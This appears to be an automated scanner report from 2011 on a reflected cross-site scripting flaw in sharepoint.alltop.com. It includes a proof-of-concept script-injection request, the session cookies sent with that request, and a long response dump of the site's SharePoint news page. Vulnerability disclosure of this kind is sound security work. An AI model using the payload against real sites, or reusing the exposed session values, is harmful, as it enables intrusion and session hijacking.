XSS, sharepoint.alltop.com, Cross Site Scripting, favicon.ico, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Wed Mar 09 13:41:59 CST 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. Cross-site scripting (reflected)



1. Cross-site scripting (reflected)

Summary

Severity:   High
Confidence:   Certain
Host:   http://sharepoint.alltop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6c4d"><script>alert(1)</script>365c9a34273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /favicon.icoa6c4d"><script>alert(1)</script>365c9a34273 HTTP/1.1
Host: sharepoint.alltop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=i4a5ogk64978pgcjhn10qfejb6; alltop_v=6759b10752dbbe66e1a60326bda6ac2b; alltop_r=159; sifrFetch=true; __utmz=160012002.1299617018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=160012002.1234645092.1299617018.1299617018.1299617018.1; __utmc=160012002; __utmb=160012002.2.9.1299617018356; __qca=P0-414054026-1299617018360; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2369|Q_2361|Q_2360|Q_2359|Q_2358|Q_2357|Q_2356|Q_2342|Q_1213|Q_1153|Q_1152|Q_1151|Q_1150|Q_1145|Q_1144|Q_982; __csref=; __cst=55b31d41f349b318; __csv=62b61914aa0d8829; __csnv=e41c05f363497f5c; __ctl=62b61914aa0d88291

Response

HTTP/1.1 404 Not Found
Date: Tue, 08 Mar 2011 20:44:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Mon, 08-Mar-2010 20:44:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=i4a5ogk64978pgcjhn10qfejb6; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:44:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=159; expires=Mon, 06-Jun-2011 20:44:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 248965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Alltop - Top SharePoint News</title>
   <meta name="description" content="Sharepoint News and headlines from across the web." />
   <meta name="keywords" content="Microsoft, SharePoint, document management, platform, collaborative workspace" />
   <link rel="icon" href="/favicon.ico" type="image/x-icon" />
   <meta name="author" content="electricpulp.com" />
   <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://sharepoint.alltop.com/rss/" />
   <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" />
   <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" />
   <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" />

<!--[if IE 6]>
   <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" />
<![endif]-->
   
   <!-- Behaviors -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script>
   <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script>
   <script type="text/javascript" charset="utf-8"><!--// <![CDATA[
   var resultsSlider;
   var load_method = (window.ie ? 'load' : 'domready');
   window.addEvent(load_method, function(){
       resultsSlider = new Fx.Slide('results', {duration: 500});
       resultsSlider.hide();
   });
   var skip_nav = true;
   // ]]> --></script>
   <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script>
   
       <style type="text/css">
       .add-feed {
           display:none;
       }
   </style>
   
   <!-- Analytics -->
   <script type="text/javascript">
   window.google_analytics_uacct = "UA-1701157-4";
   google_analytics_domain_name = ".alltop.com";
   </script>

   <!-- Ads -->
   <script type='text/javascript'><!--// <![CDATA[
   var OA_source = 'tech';
   var OA_zones = {
   'leaderboard' : 70,
   'top_script' : 72,
   'slot_3_300_250' : 66,
   'slot_9_300_250' : 69,
   'slot_3' : 24
   }
   // ]]> --></script>
   <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1'></script>
   
   <!-- Typography -->
   <script type="text/javascript" src="/scripts/sifr/sifr.js"></script>
   <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script>

   <!-- Video -->
   <script type="text/javascript" src="/scripts/swfobject-for-video.js"></script>
   <script type="text/javascript" src="/scripts/videobox.js"></script>
   <link rel="stylesheet" href="/css/videobox.css" type="text/css" media="screen" />

</head>
<body>
<script type='text/javascript'><!--// <![CDATA[
OA_show('top_script');
// ]]> --></script>

<div id="wrapper">
   <div id="opener">
       <a href="http://alltop.com/" id="logo">Alltop</a>
   
       <div id="leaderboard">
           <script type='text/javascript'><!--// <![CDATA[
           OA_show('leaderboard');
           // ]]> --></script>
       </div>
   </div>    
       <div id="wrap-discover">
       <div id="discover" class="clearfix">
           <div id="discover-by-cat">
                               <ul id="categories">
                   <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li>                </ul>
           </div>

           <div id="discover-alpha">
                               <ul id="alpha">
                   <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li>                </ul>
           </div>
       </div>
   </div>        
   <div id="wrap-search">
       <div id="search" class="clearfix">
           <ul id="navigation" class="tabs">
               <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li>
               <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li>
               <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li>
               <li><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li>
               <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li>
           </ul>
           <div id="search-box">
               <form action="/" method="get" id="search-form">
                   <input type="text" name="keywords" value="" id="key-words" />
                   <input type="image" src="/img/search-bttn.gif" id="bttn-search" />
               </form>
           </div>
       </div>
   </div>
   <div id="content">
       <div id="wrap-results">
           <div id="slide-results">
               <div id="results" class="clearfix" style="visibility:hidden;">
                                   </div>
           </div>
       </div>
       
       <div id="headlines" class="hfeed clearfix">
           
           <h1 id="pagetitle" class="din">
               SharePoint                            </h1>

               <ul id="top-five" class="feed-block">
       <li class="site">
           <h2>Most Topular Stories</h2>
       </li>
                   <li class="hentry">
               <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/chandima/~3/T09KVbtl598/ViewPost.aspx" rel="bookmark" target="_blank">Configuring RBS for SharePoint...Step by Step Guide</a></h3>
               <div class="full-post">
                                       <div class="site-title">Chandima.Net Blog for SharePoint solutions: Posts</div>
                                                           <div class="author">Chandima Kulathilake</div>
                                       <div class="published">3 Feb 2011 | 3:11 am</div>
                   <div class="entry-content">
                       <div class="entry-bound">Body: Via the team @knowledgecue and @ckukltd you can get hold of this step by step guide. This is a collaborative effort with Steve Smith of Combined Knowledge (UK). Steve runs a unique training class aimed for Infrastructure administrators who want to know about SharePoint in depth and this is one of the many module from that class. Remote Blob Storage (RBS) is a capability of SQL server 2008 and 2008R2 that can be used to offload content stored in databases to the file system. The guide covers the following three scenarios. Setup and configure FILESTREAM and RBS for a new content database.</div>
                   </div>
               </div>
           </li>
                       <li class="hentry">
               <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Harbar/~3/qjXsLbna7SA/324.aspx" rel="bookmark" target="_blank">Decent SharePoint Books!!!!</a></h3>
               <div class="full-post">
                                       <div class="site-title">harbar.net</div>
                                                           <div class="author">Spence</div>
                                       <div class="published">25 Feb 2011 | 5:47 pm</div>
                   <div class="entry-content">
                       <div class="entry-bound">I...m frequently asked for SharePoint book recommendations. This is tricky because from my point of view most of them are rubbish. The publisher driven gold rush to get titles on the shelf on or around the release of a product really is very bad from a quality perspective. The amount of misinformation in SharePoint 2010 books in particular is outstanding. The good news is that things are beginning to get back on kilter and there have recently been some excellent books released. Here...s a very mini review of some quality titles recently published. Professional Business Connectivity Services&hellip;</div>
                   </div>
               </div>
           </li>
                       <li class="hentry">
               <h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/03/05/SharePoint-2010-additions-and-changes-[dash]-64-[dash]-27th-February-to-5th-March-2011.aspx" rel="bookmark" target="_blank">SharePoint 2010 additions and changes - 64 - 27th February to 5th March 2011</a></h3>
               <div class="full-post">
                                       <div class="site-title">Mike Walsh's WSS and more</div>
                                                           <div class="published">4 Mar 2011 | 7:13 pm</div>
                   <div class="entry-content">
                       <div class="entry-bound">Note: All of the addresses below were valid at the time I added them to the SPF 2010 FAQ site and to this file. I can't guarantee that they still are. .. (Items are added to the SPF 2010 FAQ throughout the week so you will find new items more quickly by checking at wssv4faq.mindsharp.com daily.) .. From 27th February to 5th March 2011 .. NOTE: Amendments to KB articles are now only listed when a version is x.0. MS no longer change the dates of KB articles when version changes are minor. .. I.1 2010 KB Articles .. New .. http://support.microsoft.com/kb/2276961/en-us .. SharePoint Upgrade and&hellip;</div>
                   </div>
               </div>
           </li>
                       <li class="hentry">
               <h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/03/06/It[squo]s-a-thread-about-MOSS-2007,-let[squo]s-ask-a-SP-2010-question-in-it.aspx" rel="bookmark" target="_blank">It's a thread about MOSS 2007, let's ask a SP 2010 question in it</a></h3>
               <div class="full-post">
                                       <div class="site-title">Mike Walsh's WSS and more</div>
                                                           <div class="published">6 Mar 2011 | 5:48 am</div>
                   <div class="entry-content">
                       <div class="entry-bound">I just don't get it. .. There is a set of forums for the SP 2010 products and a different set of forums for the &quot;pre-2010&quot; SharePoint products - i.e. the SP products from 2007, 2003 and (stretching it) 2001. .. We are at the moment running at an average of anything between 10 and 20 threads a day that are SP 2010 threads posted to a pre-SP 2010 forum and which thus need to be moved. However that - perhaps surprisingly isn't my main grievance because many of the posters are new posters who don't know there are SP 2010 forums (the old posters who should know better are not my&hellip;</div>
                   </div>
               </div>
           </li>
                       <li class="hentry">
               <h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/03/05/The-joys-of-[dquo]working[dquo]-from-a-hotel-lobby.aspx" rel="bookmark" target="_blank">The joys of &quot;working&quot; from a hotel lobby</a></h3>
               <div class="full-post">
                                       <div class="site-title">Mike Walsh's WSS and more</div>
                                                           <div class="published">4 Mar 2011 | 11:32 pm</div>
                   <div class="entry-content">
                       <div class="entry-bound">I've spent the past five weeks moderating the pre-SP 2010 forums from the lobby of my holiday hotel. .. Here are a few things I've noticed. .. The first thing is that almost all people using their computers and other devices in the lobby of this particular holiday hotel were clearly not &quot;working&quot;. There was in fact only one women using a MacPro who I suspected could..have been doing the same sort of thing as me but in the two weeks she was there I never was able to walk behind her to look. The other part of the coin is that clearly (see the third point) nobody there expected anyone&hellip;</div>
                   </div>
               </div>
           </li>
               </ul>
   
<ul id="feed38062" class="feed-block e5a52cd4c3cfdd6779afd35235db00a5">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.msdn.com/b/pstubbs/" target="_blank" class="snap_shots">Sharepoint 2010</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pstubbs/archive/2011/02/25/now-on-msdn-sharepoint-2010-developer-training-course.aspx" rel="bookmark" target="_blank">Now on MSDN: SharePoint 2010 Developer Training Course</a></h3>

<div class="full-post">
<div class="author">Paul Stubbs [MSFT]</div>
<div class="published">25 Feb 2011 | 8:47 am</div>
<div class="entry-content">
<div class="entry-bound">The Channel 9 Office and SharePoint Developer Training Courses have been moved and are now available on MSDN. All the same great content just a new location. SharePoint : http://msdn.microsoft.com/SP2010DevTrainingCourse The Office 2010 Developer Training...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pstubbs/archive/2011/02/01/sharepoint-sideshow-learn-sharepoint-search-at-fast-university.aspx" rel="bookmark" target="_blank">SharePoint Sideshow... Learn SharePoint Search at FAST University</a></h3>

<div class="full-post">
<div class="author">Paul Stubbs [MSFT]</div>
<div class="published">1 Feb 2011 | 2:58 pm</div>
<div class="entry-content">
<div class="entry-bound">Today on the SharePoint Sideshow I talk with Cliff Fitzgerald about resources for learning FAST Search in SharePoint. Cliff walks through the huge number of training and learning options available at FAST University and on MSDN. Watch online at: http...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pstubbs/archive/2011/01/30/sharepoint-2010-hands-on-labs-updated.aspx" rel="bookmark" target="_blank">SharePoint 2010 Hands on Labs...Updated</a></h3>

<div class="full-post">
<div class="author">Paul Stubbs [MSFT]</div>
<div class="published">30 Jan 2011 | 10:28 am</div>
<div class="entry-content">
<div class="entry-bound">It has been exactly one year since I posted about running the Hands on Labs from the Channel 9 Training Courses . Some of the links in the post had gone stale or were pointing to beta versions. I updated all of the links to point to the current versions...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pstubbs/archive/2010/11/24/sharepoint-sideshow-setting-up-a-development-environment.aspx" rel="bookmark" target="_blank">SharePoint Sideshow...Setting Up a Development Environment</a></h3>

<div class="full-post">
<div class="author">Paul Stubbs [MSFT]</div>
<div class="published">24 Nov 2010 | 6:12 am</div>
<div class="entry-content">
<div class="entry-bound">Today on the SharePoint sideshow Donovan and I talk about how to setup up a SharePoint developer machine using the Information Worker Virtual Machine (VM). The VM is a Hyper-V based VHD file that has everything you need to start developing SharePoint...(read more)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.msdn.com/b/pstubbs/archive/2010/10/27/sharepoint-easy-setup-walkthrough.aspx" rel="bookmark" target="_blank">SharePoint Easy Setup : Walkthrough</a></h3>

<div class="full-post">
<div class="author">Paul Stubbs [MSFT]</div>
<div class="published">27 Oct 2010 | 5:51 pm</div>
<div class="entry-content">
<div class="entry-bound">Chris Johnson has a good walkthrough of the SharePoint Easy Setup Script. He shows you a brief example and screenshots of the process and experience. http://blogs.msdn.com/b/cjohnson/archive/2010/10/28/announcing-sharepoint-easy-setup-for-developers.aspx...(read more)</div>
</div>
</div>

</li>
</ul>
<div id="ad-1" class="ad-unit feed-block"><script type='text/javascript'><!--// <![CDATA[
OA_show('slot_3_300_250');
// ]]> --></script>
</div>
<div class="row-clear">&nbsp;</div>
<ul id="feed30122" class="feed-block bd7e54ceb844d331c9086fbd8c016492">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://sharepoint.mindsharpblogs.com/MikeW" target="_blank" class="snap_shots">Mike Walsh's WSS and more</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/03/06/It[squo]s-a-thread-about-MOSS-2007,-let[squo]s-ask-a-SP-2010-question-in-it.aspx" rel="bookmark" target="_blank">It's a thread about MOSS 2007, let's ask a SP 2010 question in it</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">6 Mar 2011 | 5:48 am</div>
<div class="entry-content">
<div class="entry-bound">I just don't get it. .. There is a set of forums for the SP 2010 products and a different set of forums for the &quot;pre-2010&quot; SharePoint products - i.e. the SP products from 2007, 2003 and (stretching it) 2001. .. We are at the moment running at an average of anything between 10 and 20 threads a day that are SP 2010 threads posted to a pre-SP 2010 forum and which thus need to be moved. However that - perhaps surprisingly isn't my main grievance because many of the posters are new posters who don't know there are SP 2010 forums (the old posters who should know better are not my&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/03/05/The-joys-of-[dquo]working[dquo]-from-a-hotel-lobby.aspx" rel="bookmark" target="_blank">The joys of &quot;working&quot; from a hotel lobby</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">4 Mar 2011 | 11:32 pm</div>
<div class="entry-content">
<div class="entry-bound">I've spent the past five weeks moderating the pre-SP 2010 forums from the lobby of my holiday hotel. .. Here are a few things I've noticed. .. The first thing is that almost all people using their computers and other devices in the lobby of this particular holiday hotel were clearly not &quot;working&quot;. There was in fact only one women using a MacPro who I suspected could..have been doing the same sort of thing as me but in the two weeks she was there I never was able to walk behind her to look. The other part of the coin is that clearly (see the third point) nobody there expected anyone&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/03/05/SharePoint-2010-additions-and-changes-[dash]-64-[dash]-27th-February-to-5th-March-2011.aspx" rel="bookmark" target="_blank">SharePoint 2010 additions and changes - 64 - 27th February to 5th March 2011</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">4 Mar 2011 | 7:13 pm</div>
<div class="entry-content">
<div class="entry-bound">Note: All of the addresses below were valid at the time I added them to the SPF 2010 FAQ site and to this file. I can't guarantee that they still are. .. (Items are added to the SPF 2010 FAQ throughout the week so you will find new items more quickly by checking at wssv4faq.mindsharp.com daily.) .. From 27th February to 5th March 2011 .. NOTE: Amendments to KB articles are now only listed when a version is x.0. MS no longer change the dates of KB articles when version changes are minor. .. I.1 2010 KB Articles .. New .. http://support.microsoft.com/kb/2276961/en-us .. SharePoint Upgrade and&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/02/26/SharePoint-2010-additions-and-changes-[dash]-63-[dash]-20th-to-26th-February-2011-.aspx" rel="bookmark" target="_blank">SharePoint 2010 additions and changes - 63 - 20th to 26th February 2011</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">25 Feb 2011 | 7:17 pm</div>
<div class="entry-content">
<div class="entry-bound">Note: All of the addresses below were valid at the time I added them to the SPF 2010 FAQ site and to this file. I can't guarantee that they still are. .. (Items are added to the SPF 2010 FAQ throughout the week so you will find new items more quickly by checking at wssv4faq.mindsharp.com daily.) .. From 20th to 26th February 2011 .. NOTE: Amendments to KB articles are now only listed when a version is x.0. MS no longer change the dates of KB articles when version changes are minor. .. I.1 2010 KB Articles .. New .. http://support.microsoft.com/kb/2504135/en-us .. Description of the SharePoint&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://sharepoint.mindsharpblogs.com/MikeW/archive/2011/02/19/SharePoint-2010-additions-and-changes-[dash]-62-[dash]-13th-to-19th-February-2011-.aspx" rel="bookmark" target="_blank">SharePoint 2010 additions and changes - 62 - 13th to 19th February 2011</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">18 Feb 2011 | 7:33 pm</div>
<div class="entry-content">
<div class="entry-bound">Note: All of the addresses below were valid at the time I added them to the SPF 2010 FAQ site and to this file. I can't guarantee that they still are. .. (Items are added to the SPF 2010 FAQ throughout the week so you will find new items more quickly by checking at wssv4faq.mindsharp.com daily.) .. From 13th to 19th February 2011 .. NOTE: Amendments to KB articles are now only listed when a version is x.0. MS no longer change the dates of KB articles when version changes are minor. .. I.1 2010 KB Articles .. New .. http://support.microsoft.com/kb/2266203/en-us .. You cannot view a list in&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11120" class="feed-block 6bb8b9e91e330b91590077092a777a3d">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.andrewconnell.com/blog/Default.aspx" target="_blank" class="snap_shots">Andrew Connell [MVP SharePoint]</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndrewConnell/~3/4d1czqR44C8/london-sharepoint-best-practices-conference-ndash-april-11-13-2011.aspx" rel="bookmark" target="_blank">London SharePoint Best Practices Conference &ndash; April 11-13, 2011</a></h3>

<div class="full-post">
<div class="author">Andrew Connell</div>
<div class="published">11 Feb 2011 | 2:57 am</div>
<div class="entry-content">
<div class="entry-bound">Two years ago I had the chance to attend and present at the SharePoint Best Practice conference in London. Last year I had the same op but was stuck in Norway when the volcano screwed travel up for most of Europe. Thankfully I get another shot at it this coming April! This is by far one of the best held conferences around for SharePoint folk. It...s a top notch crew of speakers, content and is one of the better shows in terms of logistics and implementation. I...ll be presenting two sessions at this show: Incorporating Managed Metadata in Custom Solutions in SharePoint 2010 The Managed&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndrewConnell/~3/cQJgCUwD9Vk/minimizing-the-page-weight-in-anonymous-sharepoint-2010-publishing-sites.aspx" rel="bookmark" target="_blank">Minimizing the page weight in anonymous SharePoint 2010 Publishing Sites</a></h3>

<div class="full-post">
<div class="author">Andrew Connell</div>
<div class="published">8 Feb 2011 | 5:54 am</div>
<div class="entry-content">
<div class="entry-bound">SharePoint 2010 uses a lot of JavaScript libraries to implement the very rich and responsive user experience. Many of these libraries are necessary to implement the ribbon and other editing controls. While the new script-on-demand (SOD) capability in SharePoint 2010 is supposed to suppress libraries that aren...t needed on a specific page request, some still seem to get through. Chris O...Brien has a fantastic approach to removing known libraries, by name, from the page request to make for an even smaller page weight in SharePoint 2010. Check out his post: .. Chris O...Brien: Eliminating&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndrewConnell/~3/QKftyuJoMZk/sharepoint-connections-coast-to-coast-irsquoll-be-there-san-antonio-amp-san.aspx" rel="bookmark" target="_blank">SharePoint Connections Coast-to-Coast: I&rsquo;ll be there! (San Antonio & San Diego)</a></h3>

<div class="full-post">
<div class="author">Andrew Connell</div>
<div class="published">8 Feb 2011 | 3:30 am</div>
<div class="entry-content">
<div class="entry-bound">The folks at DevConnections have kicked off a new roadshow that...s hitting 6 cities from March 2011 ... May. These events, three-days in duration, will deliver some top-notch content for SharePoint administrators, developers and power users in addition to a one-day SharePoint 2010 Development Bootcamp! I...m presenting three sessions in the San Antonio, TX (March 14-16, 2011) stop and San Diego, CA (May 2-4, 2011) stop. The sessions I plan to present are as follows: Building Silverlight Applications for SharePoint 2010...... SharePoint 2010 introduced numerous capabilities available to&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndrewConnell/~3/STWIrBpiW9Q/critical-path-training-welcomes-new-instructor-dan-holme.aspx" rel="bookmark" target="_blank">Critical Path Training Welcomes New Instructor Dan Holme!</a></h3>

<div class="full-post">
<div class="author">Andrew Connell</div>
<div class="published">7 Feb 2011 | 4:01 am</div>
<div class="entry-content">
<div class="entry-bound">We at Critical Path Training are thrilled to announce the addition of a fantastic and well known SharePoint MVP to our list of highly qualified SharePoint instructors! Dan Holme is a SharePoint MVP who...s presented at numerous major conferences such as SharePoint Connections, TechEd and the SharePoint Conference. Dan is an independent consultant just like all our other instructors so if you...re looking for someone to assist you with a SharePoint project, like the rest of our instructors, he is a qualified candidate who we highly recommend. Dan will focus on teaching our SharePoint 2010&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndrewConnell/~3/OHxkFSs88P4/the-definitive-resource-for-all-things-bcs-in-sharepoint-2010.aspx" rel="bookmark" target="_blank">THE definitive resource for all things BCS in SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">Andrew Connell</div>
<div class="published">7 Feb 2011 | 3:55 am</div>
<div class="entry-content">
<div class="entry-bound">Having other books by Scot Hillier, I had high expectations for the book Professional Business Connectivity Services in SharePoint 2010and it blew those away. I teach SharePoint 2010 development and have found that one of the more challenging subjects to find details on. This book covers every single aspect of Business Connectivity Services (BCS) in SharePoint 2010. It starts out with a good discussion explaining the need and how it addresses the common challenges we face. It then goes into the details of how to implement and use custom BCS solutions using SharePoint Designer 2010. Scot and&hellip;</div>
</div>
</div>

</li>
</ul>
<div id="ad-2" class="ad-unit feed-block"></div>
<div class="row-clear">&nbsp;</div>
<ul id="feed11121" class="feed-block a9e4886a03f40dee86de8405450f6e86">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://weblogs.asp.net/bsimser/default.aspx" target="_blank" class="snap_shots">Fear and Loathing</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/bsimser/~3/TJxzU55ZxJw/sharepoint-content-type-cheat-sheet.aspx" rel="bookmark" target="_blank">SharePoint Content Type Cheat Sheet</a></h3>

<div class="full-post">
<div class="author">Bil Simser</div>
<div class="published">15 Feb 2011 | 8:20 am</div>
<div class="entry-content">
